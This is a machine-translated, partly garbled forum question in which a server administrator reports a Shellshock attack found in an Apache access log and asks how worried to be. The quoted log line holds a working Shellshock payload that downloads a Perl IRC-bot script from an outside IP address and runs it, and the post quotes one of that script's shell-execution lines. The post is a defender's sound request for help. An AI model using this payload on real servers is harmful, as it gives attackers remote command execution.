我看到下面的行/var/log/apache2/access_log
下:慶典彈震jurat Perl腳本
"GET /cgi-bin/hi HTTP/1.0" 404 357 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""
我還沒有得到解決,以修補慶典呢。我立即關閉機器。
有沒有人在他們的日誌中看到過這個和/或檢查了在http://213.5.67.223/jurat
找到的Perl腳本?這看起來相當溫和,但我想知道我應該如何擔心?
在線路338可以看到shell
函數執行一個從某人拿來這是使用相同的用戶級別與apache
服務器執行的IRC通道
my @resp=`$comando 2>&1 3>&1`;
的另一端的外殼命令。我只是希望他們無法升級特權。
有這個腳本小子試圖[這裏] [1] [1]另議:http://superuser.com/questions/818257/is-this-an-攻擊或將要關注的東西-showshock – 2014-10-04 14:25:10
請參閱此處的另一個線程:http://superuser.com/questions/818257/is-this-an-attack-or-something-tobe -concerned-about-shellshock – 2014-10-04 14:27:13